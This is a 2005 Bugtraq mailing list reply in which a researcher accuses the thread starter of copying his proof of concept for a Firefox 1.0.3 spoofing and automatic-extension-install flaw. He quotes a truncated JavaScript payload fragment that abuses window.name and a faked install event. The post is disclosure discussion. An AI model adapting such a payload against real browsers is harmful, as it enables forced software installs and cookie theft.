Bugtraq mailing list archives

Re: firefox 1.0.3 spoof+auto dl

From: Paul <paul () greyhats cjb net>
Date: 8 May 2005 13:01:48 -0000

In-Reply-To: <20050507173037.20610.qmail () www securityfocus com>

This is the copy of my PoC. The person responsible for the leak of my remote compromise is the starter of this thread. 
In fact, he copies some of the code directly from my PoC:

javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\'){window.name=\'stealcookies\';}  else{ 
event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You
 are vulnerable!!!

That is the window name, object creater, even direct string copies from my site. This guy is incredible.

Paul

Current thread:

firefox 1.0.3 spoof+auto dl john smith (May 07)
- <Possible follow-ups>
- Re: firefox 1.0.3 spoof+auto dl Paul (May 09)